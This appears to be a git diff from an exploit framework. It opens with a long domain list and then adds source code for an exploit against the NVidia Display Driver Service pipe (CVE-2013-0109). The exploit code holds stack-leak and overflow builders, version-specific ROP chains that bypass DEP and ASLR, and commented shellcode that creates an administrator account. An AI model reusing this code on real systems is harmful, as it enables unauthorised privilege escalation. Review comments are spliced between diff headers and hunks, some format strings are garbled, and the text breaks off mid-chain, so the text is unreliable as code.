+www.praxisww.com +www.prfelectrical.com.au +www.primaxi.com.ec +www.privatetutoringservices.com +www.privathosting.eu +www.professionalblackbook.com +www.propan.ru +www.protizer.net +www.psf-finist.ru +www.purplehorses.net +www.quickcraft.com.br +www.rcollard.com +www.realinnovation.com +www.realtimemedia.ru +www.rebeccacella.com +www.remaxhost.com +www.rempko.sk +www.riktoetenel.com +www.rlproject.xpg.com.br +www.romaleonardo.it +www.rooversadvocatuur.nl +www.roxpriv8.xpg.com.br +www.rtzdefacer.xpg.com.br +www.rtzdefacer2.xpg.com.br +www.rv-dds.nl +www.salonlaquintajardin.com +www.sama.kz +www.sanchoiv.com +www.sanseracingteam.com +www.scorpionbkn.xpg.com.br +www.searchenginesmarketingblog.com +www.secondome.com +www.serciudadano.com.ar +www.shadoww.co.in +www.sherrif.info +www.sigma-solutions.com.sg +www.sitepalace.com +www.slayerlife.com +www.slivki.com.ua +www.smilingsoulcoaching.com +www.solnechnyzaichik.ru +www.sonnoli.com +www.sowyen.co.kr +www.speedayauto.ae +www.spicermotors.net +www.spris.com +www.stdfiletonetansert.com.cn +www.stirparts.ru +www.stormpages.com +www.superintendente.xpg.com.br +www.suporte012009.xpg.com.br +www.t-sb.net +www.tdms.saglik.gov.tr +www.tehnika-hyundai.ru +www.temporadanova1.xpg.com.br +www.theartsgarage.com +www.thecorp.info +www.thekingpin.net +www.tiergestuetzt.de +www.timothykempbloodstock.co.nz +www.tmplookup.com +www.topedu.cn +www.torgi.kz +www.tpt.edu.in +www.tudoaqui2.xpg.com.br +www.ucheba.ru +www.unimedvr.com.br +www.unisgolf.ch +www.unixpoint02.xpg.com.br +www.uriyuri.com +www.usaenterprise.com +www.vamos2009.xpg.com.br +www.vip-file.eu +www.vvvic.com +www.vw-freaks.net +www.weblist.xpg.com.br +www.whataviewwindowcleaning.com +www.whitesports.co.kr +www.widestep.com +www.wigglewoo.com +www.wildsap.com +www.wilfharwood.com +www.windelectric.ua +www.witkey.com +www.wps.cn +www.wrestlingexposed.com +www.wtcorp.net +www.wypoczynku.www.wypoczynet.pl +www.wyroki.eu +www.xiruz.kit.net +www.xn----7sbhclawz4amhce8d.xn--p1ai 
+www.xn----btbheac0cddhg5d.xn--p1ai +www.xxparceroxx.xpg.com.br +www.yac.mx +www.ypu.edu.tw +www.zfttk.ru +www.zyhydh.com +www.zyxyfy.com +www12.0zz0.com +www2.unionfilesexchnges.su +www8.0zz0.com +wzhj.net +wzk.laweb.es +xamateurpornlic.www1.biz +xaumous.club-106.com.ar +xbox360modding.net +xchao123.com +xe-11-0-0.edge1.losangeles6.levei-3.net +xeclex.bl.ee +xetoware.com +xiazaiba.com +xiistones.com +xindalawyer.com +xinrongcaijing.com +xisrandom.net +xixiwg.com +xlcall.com +xlike.net +xlkj518.com +xmlbar.net +xn----htbhgq6ahee6j.xn--p1ai +xnxxwatch.com +xoomer.alice.it +xoqaquqo.the-elites.com +xorgwebs.webs.com +xpopup.com +xpornstarsckc.ddns.name +xquadra.com.mx +xserqwerdsdrasder.su +xtcheats.com +xtractb2b.info +xtremcolors.com +xtremedownload.com +xvidly.com +xxooss.com +xxxsexcamera.com +xzone-reactor.com +xzskycn.com +y2030.com +y611trsk.witnessvacant.biz +yachtfortylove.com +yalupa.com +yambotan.ru +yamleg.fu8.com +yanasushi.eu +yandex.ru.sgtfnregsnet.ru +yankeezzzz.co.uk +yanqing888.net +yaowan.com +yawclovm.net +yayasanmahasiswa.my +yazminx.com +ybabc.com +ybaopay.com +ydqxt.com +yesboan.com +yessign.or.kr +ygla.ru +yileweb.com +yiliwa.com +yj1b4.ru +yldsjs.com +yontoo.com +yougube.com +youngdevan.com +yourfilesdatak.asia +youronlineinsuranceagent.com +youtibe.com +youtope.net +youtubeaccelerator.com +youtuhe.com +youxiaxiazai.com +ytanchor.com +ytdownloader.com +ytoimneyqawernmkla.deswelt.net +yunbo99.com +yvettedefrance.com +yxbao.com +yytt77.com +yyzsoft.com +z32538.nb.host127-0-0-1.com +z43b1z.eu +z7752.com +z8games.com +za.omovigminet.ru +zaebiz.eu +zaebstonrder.com +zametki-gurmana.ru +zapto.org +zbf1.com +zbjimg.com +zc287xl.servepics.com +zctei.com +zeus.guvencelikimalat.com +zgorogo.in.ua +zgsysz.com +zhenhua.org +zhongjiebao.com +zhuoku.com +zhuti.com +zhuti6.com +zillionfasttax.info +zilliontoolkitusa.info +zinetag.net +ziputil.net +zjject.com +zkic.com +zmp3.net +zook.co.kr +zoomaru.com +zoomdownloader.com +zous.szm.sk +zrtontoskerfree.net 
+zswe4tfrhdhthr5.su +ztgame.com.cn +zukkoshop.su +zwierzu.zxy.me +zxr0.chickenkiller.com +zxr0.strangled.net +zydsoft.com diff --git a/documentation/gendocs.sh b/documentation/gendocs.sh index 7936554f11..ec48ae53e7 100755 --- a/documentation/gendocs.sh +++ b/documentation/gendocs.sh @@ -1,15 +1 @@ -OPTS="-x .ut.rb -x .ts.rb -x samples -q" -BASE="$(dirname "$0")" -MSFDIR="${BASE}/.." -DOCDIR="${BASE}/api" -doc=$(which sdoc) - -if [ -z $doc ]; then - doc=$(which rdoc) -fi - -echo "Using ${doc} for doc generation" -echo "Putting docs in ${DOCDIR}" - -$doc $OPTS -t "Metasploit Documentation" -o ${DOCDIR} ${MSFDIR}/lib/rex ${MSFDIR}/lib/msf - +rake yard diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj index 8bc56a0824..b04cb3b239 100644 --- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj +++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj @@ -70,7 +70,8 @@ /ignore:4070 - editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 _DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions) diff --git a/external/source/exploits/cve-2013-0109/make.msbuild b/external/source/exploits/cve-2013-0109/make.msbuild new file mode 100755 index 0000000000..820c6d9b39 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/make.msbuild @@ -0,0 +1,18 @@ + + + + .\nvidia_nvsvc.sln + + + + + + + + + + + + + + diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc.sln b/external/source/exploits/cve-2013-0109/nvidia_nvsvc.sln new file mode 100755 index 0000000000..9a52c16683 --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc.sln 
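Review bot: In the documentation/gendocs.sh hunk, the new one-line body `rake yard` depends on the caller's working directory, whereas the removed script derived every path from `$(dirname "$0")`. Invoked from outside the repository tree, rake will presumably not find the Rakefile and the script fails where the old one worked. The file keeps mode 100755 but has no interpreter line, so I would write it as `#!/bin/sh` followed by `cd "$(dirname "$0")/.." && exec rake yard`.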
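Review bot: In the kitrap0d.vcxproj hunk, the `exit 0` added after the `editbin.exe` call makes the post-build step report success even when editbin fails or is not on the path. A binary without the intended `/OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0` header values can then be produced with no build error. If the aim is only to tolerate toolchains that lack editbin, say so in a comment next to the command and keep the failure visible in the log, for example by appending `|| echo warning: editbin failed, header versions not patched` to the editbin line. The enclosing XML elements are not readable in this view, so which configuration the hunk belongs to is inferred from the `_DEBUG` context line.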
@@ -0,0 +1,22 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2013 +VisualStudioVersion = 12.0.21005.1 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "nvidia_nvsvc", "nvidia_nvsvc\nvidia_nvsvc.vcxproj", "{6B3FF768-1F25-49C1-8827-EDEC84D4749F}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Release|Win32 = Release|Win32 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.ActiveCfg = Debug|Win32 + {6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.Build.0 = Debug|Win32 + {6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.ActiveCfg = Release|Win32 + {6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/dllmain.c b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/dllmain.c new file mode 100755 index 0000000000..c75822e96b --- /dev/null +++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/dllmain.c 
@@ -0,0 +1,33 @@
+//===============================================================================================//
+// This is a stub for the actual functionality of the DLL.
+//===============================================================================================//
+
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
+
+#include "nvidia_nvsvc.h"
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
+ BOOL bReturnValue = TRUE;
+ switch (dwReason)
+ {
+ case DLL_QUERY_HMODULE:
+ hAppInstance = hinstDLL;
+ if (lpReserved != NULL)
+ {
+ *(HMODULE *)lpReserved = hAppInstance;
+ }
+ break;
+ case DLL_PROCESS_ATTACH:
+ hAppInstance = hinstDLL;
+ elevate_nvidia_nvsvc(lpReserved);
+ break;
+ case DLL_PROCESS_DETACH:
+ case DLL_THREAD_ATTACH:
+ case DLL_THREAD_DETACH:
+ break;
+ }
+ return bReturnValue;
+}
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp
new file mode 100755
index 0000000000..68fd9dd039
--- /dev/null
+++ b/external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp
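Review bot: In the dllmain.c hunk, the `DLL_PROCESS_ATTACH` case passes `lpReserved` straight to `elevate_nvidia_nvsvc()` without a NULL check, although the `DLL_QUERY_HMODULE` case just above guards the same pointer. In nvidia_nvsvc.cpp that function begins with `strlen((char*)payload)`, so any load where the loader supplies NULL dereferences a null pointer inside DllMain. I would wrap the call in `if (lpReserved != NULL)` and add a comment on the case stating that `lpReserved` is expected to carry a NUL-terminated buffer here rather than its documented loader meaning. As a style point, `bReturnValue` is never reassigned, so `return TRUE;` says the same thing, and the file has no trailing newline.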
@@ -0,0 +1,546 @@ +/* +NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012 +- Bypass DEP + ASLR + /GS + CoE +============================================================= +(@peterwintrsmith) + + ** Initial release 25/12/12 + ** Update 25/12/12 - Target for 30 Aug 2012 nvvsvc.exe Build - thanks + @seanderegge! + +Hey all! + +Here is an interesting exploit for a stack buffer overflow in the NVidia +Display Driver Service. The service listens on a named pipe (\pipe\nsvr) +which has a NULL DACL configured, which should mean that any logged on user +or remote user in a domain context (Windows firewall/file sharing +permitting) should be able to exploit this vulnerability. + +The buffer overflow occurs as a result of a bad memmove operation, with the +stack layout effectively looking like this: + +[locals] +[received-data] +[response-buf] +[stack cookie] +[return address] +[arg space] +[etc] + +The memmove copies data from the received-data buffer into the response-buf +buffer, unchecked. It is possible to control the offset from which the copy +starts in the received-data buffer by embedding a variable length string - +which forms part of the protocol message being crafted - as well as the +number of bytes copied into the response buffer. + +The amount of data sent back over the named pipe is related to the number +of bytes copied rather than the maximum number of bytes that the buffer is +able to safely contain, so it is possible to leak stack data by copying +from the end of the received-data buffer, through the response-buf buffer +(which is zeroed first time round, and second time round contains whatever +was in it beforehand), right to the end of the stack frame (including stack +cookie and return address). + +As the entire block of data copied is sent back, the stack cookie and +nvvsvc.exe base can be determined using the aforementioned process. 
The +stack is then trashed, but the function servicing pipe messages won't +return until the final message has been received, so it doesn't matter too +much. + +It is then possible to exploit the bug by sending two further packets of +data: One containing the leaked stack cookie and a ROP chain dynamically +generated using offsets from the leaked nvvsvc.exe base (which simply fills +the response-buf buffer when this data is echoed back) and a second packet +which contains enough data to trigger an overwrite if data is copied from +the start of the received-data buffer into the response-buf (including the +data we primed the latter to contain - stack cookie and ROP chain). + +Allowing the function to then return leads to execution of our ROP chain, +and our strategically placed Metasploit net user /add shellcode! We get +continuation of execution for free because the process spins up a thread +to handle each new connection, and there are no deadlocks etc. + +I've included two ROP chains, one which works against the nvvsvc.exe +running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers +from the Dell site, and one which works against the latest version of the +drivers for the same card, from: +http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m +http://www.geforce.co.uk/drivers/results/54709 + +Hope you find this interesting - it's a fun bug to play with! + +- Sample Session - + + +C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators +Alias name administrators +Comment Administrators have complete and unrestricted access to the computer/domain + +Members + +------------------------------------------------------------------------------- +Administrator +Peter +The command completed successfully. 
+ + +C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1 + ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) ** + [@peterwintrsmith] + - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 - + + Action 1 of 9: - CONNECT + + Action 2 of 9: - CLIENT => SERVER + Written 16416 (0x4020) characters to pipe + + Action 3 of 9: - SERVER => CLIENT + Read 16504 (0x4078) characters from pipe + + Action 4 of 9: Building exploit ... + => Stack cookie 0xe2e2893340d4: + => nvvsvc.exe base 0x13fb90000: + + Action 5 of 9: - CLIENT => SERVER + Written 16416 (0x4020) characters to pipe + + Action 6 of 9: - SERVER => CLIENT + Read 16384 (0x4000) characters from pipe + + Action 7 of 9: - CLIENT => SERVER + Written 16416 (0x4020) characters to pipe + + Action 8 of 9: - SERVER => CLIENT + Read 16896 (0x4200) characters from pipe + + Action 9 of 9: - DISCONNECT + +C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators +Alias name administrators +Comment Administrators have complete and unrestricted access to the computer/domain + +Members + +------------------------------------------------------------------------------- +Administrator +Peter +r00t +The command completed successfully. 
+ + +C:\Users\Peter\Desktop\NVDelMe1> + +*/ + +#include +#include +extern "C" { +#include "nvidia_nvsvc.h" +} + +enum EProtocolAction +{ + ProtocolAction_Connect = 0, + ProtocolAction_Receive, + ProtocolAction_Send, + ProtocolAction_Disconnect, + ProtocolAction_ReadCookie, +}; + +typedef struct +{ + EProtocolAction Action; + PBYTE Buf; + DWORD Length; +} ProtocolMessage; + +const int GENERIC_BUF_LENGTH = 0x10000; + +#define WriteByte(val) {buf[offs] = val; offs += 1;} +#define WriteWord(val) {*(WORD *)(buf + offs) = val; offs += 2;} +#define WriteDword(val) {*(DWORD *)(buf + offs) = val; offs += 4;} +#define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;} +#define BufRemaining() (sizeof(buf) - offs) + +DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer) +{ + DWORD dwWritten = 0; + + if (WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL)) + { + return dwWritten; + } + + return 0; +} + +DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE) +{ + DWORD dwRead = 0, dwAvailable = 0; + + if (bTimeout) + { + for (DWORD i = 0; i < 30; i++) + { + if (!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL)) + { + goto Cleanup; + } + + if (dwAvailable) + { + break; + } + + Sleep(100); + } + + if (!dwAvailable) + { + goto Cleanup; + } + } + + if (!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL)) + { + goto Cleanup; + } + +Cleanup: + return dwRead; +} + +HANDLE EstablishPipeConnection(char *pszPipe) +{ + HANDLE hPipe = CreateFileA( + pszPipe, + GENERIC_READ | GENERIC_WRITE, + 0, + NULL, + OPEN_EXISTING, + 0, + NULL + ); + + if (hPipe == INVALID_HANDLE_VALUE) + { + return NULL; + } + + return hPipe; +} + +BYTE *BuildMalicious_LeakStack() +{ + static BYTE buf[0x4020] = {0}; + UINT offs = 0; + + WriteWord(0x52); + + for(UINT i=0; i<0x2000; i++) + WriteWord(0x41); + + WriteWord(0); + + WriteDword(0); + WriteDword(0x4078); + + WriteDword(0x41414141); + WriteDword(0x41414141); + WriteDword(0x41414141); + 
WriteDword(0x41414141); + WriteDword(0x41414141); + + return buf; +} + +BYTE *BuildMalicious_FillBuf() +{ + static BYTE buf[0x4020] = {0}; + UINT offs = 0; + + WriteWord(0x52); + WriteWord(0); // string + + WriteDword(0); + WriteDword(0x4000); + + while(BufRemaining()) + WriteDword(0x43434343); + + return buf; +} + +BYTE *BuildMalicious_OverwriteStack() +{ + static BYTE buf[0x4020] = { 0 }; + UINT offs = 0; + + WriteWord(0x52); + WriteWord(0); // string + + WriteDword(0); + WriteDword(0x4340); // enough to copy shellcode too + + while (BufRemaining()) + { + WriteDword(0x42424242); + } + + return buf; +} + +/*! + * @brief Entry point for the exploit code. + * @param payload Pointer to the payload memory, which must be NULL terminated. + */ +VOID elevate_nvidia_nvsvc(LPVOID payload) +{ + SIZE_T payloadLen = strlen((char*)payload) + 1; + DWORD dwReturnCode = 1, dwBytesInOut = 0; + HANDLE hPipe = NULL; + + static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = { 0 }; + + memset(rgReadBuf, 0, sizeof(rgReadBuf)); + + ProtocolMessage rgConvoMsg[] = + { + { ProtocolAction_Connect, NULL, 0 }, + { ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020 }, + { ProtocolAction_Receive, { 0 }, 0x4200 }, + { ProtocolAction_ReadCookie, { 0 }, 0 }, + { ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020 }, + { ProtocolAction_Receive, { 0 }, 0x4000 }, + { ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020 }, + { ProtocolAction_Receive, { 0 }, 0x4200 }, + { ProtocolAction_Disconnect, NULL, 0 }, + }; + + DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0; + BOOL bTryAgain = FALSE; + char szPipe[256] = "\\\\.\\pipe\\nvsr"; + + // We could renable remote hosts to target other devices on network?! 
+ // sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]); + + while (i < dwNumberOfMessages) + { + printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages); + + switch (rgConvoMsg[i].Action) + { + case ProtocolAction_Connect: + printf(" - CONNECT\n"); + + hPipe = EstablishPipeConnection(szPipe); + if (!hPipe) + { + printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError()); + goto Cleanup; + } + + break; + case ProtocolAction_Disconnect: + printf(" - DISCONNECT\n"); + + CloseHandle(hPipe); + hPipe = NULL; + + break; + case ProtocolAction_Send: + printf(" - CLIENT => SERVER\n"); + + if (!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length))) + { + printf("!! Error writing to pipe\n"); + goto Cleanup; + } + + printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut); + + break; + case ProtocolAction_Receive: + printf("\t - SERVER => CLIENT\n"); + + if (!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE))) + { + printf("!! Error reading from pipe (at least, no data on pipe)\n"); + goto Cleanup; + } + + printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut); + + break; + case ProtocolAction_ReadCookie: + + // x64 Metasploit cmd/exec: + // "net user r00t r00t00r! 
/add & net localgroup administrators /add" + // exitfunc=thread + /*char code[] = "" + "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" + "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" + "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" + "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" + "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" + "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" + "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" + "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" + "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" + "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" + "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" + "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" + "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" + "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" + "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" + "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" + "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" + "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" + "\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30" + "\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64" + "\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72" + "\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74" + "\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00";*/ + printf("Building exploit ...\n"); + unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034); + printf("\t\t => Stack cookie 0&x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie); + + memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8); + + unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL; + + // Perform some limited 
fingerprinting (my default install version, vs latest at time of testing) + switch (uiRetnAddress & 0xfff) + { + case 0x640: // nvvsvc.exe - 03 Nov 2011 - 1,640,768 bytes - md5=3947ad5d03e6abcce037801162fdb90d + uiBase = uiRetnAddress - 0x4640; + printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); + + pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8)); + + // Param 1: lpAddress [r11 (near rsp) into rcx] + pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn + pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn + pRopChain[2] = 0; // Padding + pRopChain[3] = 0; // ... + pRopChain[4] = 0; // ... + pRopChain[5] = 0; // ... + pRopChain[6] = 0; // ... + pRopChain[7] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn + pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] + pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn + pRopChain[10] = 0; // Padding + pRopChain[11] = 0; // ... + pRopChain[12] = 0; // ... + pRopChain[13] = 0; // ... + pRopChain[14] = 0; // ... 
+ pRopChain[15] = uiBase + 0x7772; // nvvsvc.exe+0x7772: pop r8; retn + pRopChain[16] = 0x40; // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] + pRopChain[17] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn + // Param 4: lpflOldProtect [r9 - already points at writable location] + pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect + pRopChain[19] = uiBase + 0x5d60; // nvvsvc.exe+0x5d60: mov rax, [rax]; retn + pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax + pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect) + + memcpy(pRopChain + 22, payload, payloadLen); + break; + case 0x9f1: // nvvsvc.exe - 30 Aug 2012 - 891,240 bytes - md5=43f91595049de14c4b61d1e76436164f + uiBase = uiRetnAddress - 0x39f1; + printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); + + pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8)); + + // Param 1: lpAddress [r11 (near rsp) into rcx] + pRopChain[0] = uiBase + 0x15d36; // nvvsvc.exe+0x15d36: mov rax, r11; retn + pRopChain[1] = uiBase + 0x5493c; // nvvsvc.exe+0x5493c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn + pRopChain[2] = 0; // Padding ... + pRopChain[3] = 0; // ... + pRopChain[4] = 0; // ... + pRopChain[5] = 0; // ... + pRopChain[6] = 0; // ... + pRopChain[7] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn + pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] + pRopChain[9] = uiBase + 0x55dbf; // nvvsvc.exe+0x55dbf: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn + pRopChain[10] = 0; // Padding ... + pRopChain[11] = 0; // ... + pRopChain[12] = 0; // ... + pRopChain[13] = 0; // ... + pRopChain[14] = 0; // ... 
+ // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] + pRopChain[15] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn + pRopChain[16] = 0x40; // PAGE_EXECUTE_READWRITE + pRopChain[17] = uiBase + 0x8b92; // nvvsvc.exe+0x55dbf: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn + pRopChain[18] = 0; // Padding ... + pRopChain[19] = 0; // ... + pRopChain[20] = 0; // ... + pRopChain[21] = 0; // ... + pRopChain[22] = 0; // ... + // Param 4: lpflOldProtect [r9 - already points at writable location] + pRopChain[23] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn + pRopChain[24] = uiBase + 0x91308; // IAT entry &VirtualProtect - 0x130 + pRopChain[25] = uiBase + 0x82989; // nvvsvc.exe+0x82989: mov rax, [rax+130h]; add rsp, 28h; retn + pRopChain[26] = 0; // Padding ... + pRopChain[27] = 0; // ... + pRopChain[28] = 0; // ... + pRopChain[29] = 0; // ... + pRopChain[30] = 0; // ... + pRopChain[31] = uiBase + 0x44ba6; // nvvsvc.exe+0x44ba6: jmp eax + pRopChain[32] = uiBase + 0x77c59; // nvvsvc.exe+0x77c59: jmp esp + + memcpy(pRopChain + 33, payload, payloadLen); + break; + case 0xa11: // nvvsvc.exe - 01 Dec 2012 - 890,216 md5=3341d2c91989bc87c3c0baa97c27253b + uiBase = uiRetnAddress - 0x3a11; + printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); + + pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8)); + + // Param 1: lpAddress [r11 (near rsp) into rcx] + pRopChain[0] = uiBase + 0x15b52; // nvvsvc.exe+0x15b52: mov rax, r11; retn + pRopChain[1] = uiBase + 0x54d4c; // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn + pRopChain[2] = 0; // Padding ... + pRopChain[3] = 0; // ... + pRopChain[4] = 0; // ... + pRopChain[5] = 0; // ... + pRopChain[6] = 0; // ... + pRopChain[7] = uiBase + 0x8d7aa; // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn + pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] + pRopChain[9] = 0; // Padding ... 
